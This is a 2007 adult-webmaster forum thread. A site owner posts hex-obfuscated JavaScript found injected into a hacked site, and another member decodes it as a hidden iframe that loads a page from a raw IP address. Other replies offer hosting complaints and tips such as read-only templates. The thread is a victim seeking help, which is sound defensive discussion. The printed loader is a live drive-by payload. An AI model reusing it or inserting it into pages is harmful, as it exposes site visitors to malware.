GoFuckYourself.com - Adult Webmaster Forum

GoFuckYourself.com - Adult Webmaster Forum (https://gfy.com/index.php)
-   Fucking Around & Business Discussion (https://gfy.com/forumdisplay.php?f=26)
-   -   One of my sites hacked, question about code (https://gfy.com/showthread.php?t=791943)

Global-X 12-13-2007 03:10 PM

One of my sites hacked, question about code
 
So I just found out someone managed to add some javascript/exploit to one of my sites. No idea yet how they got in, site is running on smartthumbs/atx, all other sites on the server are fine.

Anyone got an idea what this code is doing :

<script> var s='3C696672616D65207372633D22687474703A2F2F3139352 E352E3131362E3235302F65782F7374617469632E706870222 077696474683D32206865696768743D32207374796C653D226 46973706C61793A6E6F6E65223E3C2F696672616D653E'; var o=''; for(i=0;i<s.length;i=i+2) { var c=String.fromCharCode(37); o=o+c+s.substr(i,2);} document.write(unescape(o)); </script>

High Class Grass 12-13-2007 03:13 PM

nothing to worry about, ur just paranoid

Global-X 12-13-2007 03:15 PM

Quote:

Originally Posted by High Class Grass (Post 13510376)
nothing to worry about, ur just paranoid

You smoke too much

Nookster 12-13-2007 03:15 PM

Let me throw a wild guess into the wind. Hosting at webair?? LOL

Global-X 12-13-2007 03:20 PM

Quote:

Originally Posted by Nookster (Post 13510405)
Let me throw a wild guess into the wind. Hosting at webair?? LOL


This server is with webair yes, please explain, I just reset my ftp password

Nookster 12-13-2007 03:23 PM

Quote:

Originally Posted by Global-X (Post 13510427)
This server is with webair yes, please explain, I just reset my ftp password

Get a more reliable host. I've noticed patterns developing with webair and that "mystical" javascript code showing up magically in the headers of sites hosted on webair. Something is being exploited within the webair administration interface for sure. Just don't know what. :2 cents:

Global-X 12-13-2007 03:31 PM

Quote:

Originally Posted by Nookster (Post 13510439)
Get a more reliable host. I've noticed patterns developing with webair and that "mystical" javascript code showing up magically in the headers of sites hosted on webair. Something is being exploited within the webair administration interface for sure. Just don't know what. :2 cents:

It's true that I never experienced anything like this with my servers at nationalnet or phatservers but I though webair has a good reputation, lots of webmasters using them

pastafari 12-14-2007 02:47 AM

http://www.gofuckyourself.com/showthread.php?t=787142

:(:(:(:(:(:(:(

Violetta 12-14-2007 02:55 AM

time to change your ftp login!

Global-X 12-14-2007 03:32 AM

Quote:

Originally Posted by Rockatansky (Post 13512682)
time to change your ftp login!

I wish it was that simple

boneless 12-14-2007 03:45 AM

since i keep my templates in comus and st set to 644 or 444 permissions i havent had any iframes added to my pages anymore.

drjones 12-14-2007 07:30 AM

The code writes this to your web pages:

<iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>

Quickdraw 12-14-2007 07:43 AM

Did you upgrade your ATX recently? They had a security update last week I believe.

miroz 12-14-2007 08:04 AM

read this: http://askdamage.com/t21776-p2-we-ne...urity-now.html

Global-X 12-14-2007 08:04 AM

Quote:

Originally Posted by drjones (Post 13513387)
The code writes this to your web pages:

<iframe src="http://195.5.116.250/ex/static.php" width=2 height=2 style="display:none"></iframe>

Thanks for the info

Global-X 12-14-2007 08:14 AM

Quote:

Originally Posted by miroz (Post 13513458)


Hmmm......... seems I'm not the only one, chmodded my smart thumbs templates to 444 and until now I'm fine again

million 12-14-2007 08:40 AM

get another host, not going to promote mine here, but do yourself a favor and get out of that webair oversold crap

Global-X 12-14-2007 09:35 AM

Quote:

Originally Posted by million (Post 13513588)
get another host, not going to promote mine here, but do yourself a favor and get out of that webair oversold crap

What do you mean with oversold?? It's a dedicated server with zero downtime since 1 year+, so far I'm happy with them

monstergalleriesdotnet 12-21-2007 01:12 PM

bummpppppp

jo3 12-21-2007 01:51 PM

this happened to one of my SSH accounts last week

TURN THAT SHIT OFF UNLESS YOU NEED IT

the script interprets out to an invisible iframe... go figure =/

again, secure your sites by turning off ssh and contact your host to see anymore information that can dig up for you and to protect it from happening in the future.


All times are GMT -7. The time now is 10:52 PM.

Powered by vBulletin® Version 3.8.8
Copyright ©2000 - 2025, vBulletin Solutions, Inc.
©2000-, AI Media Network Inc123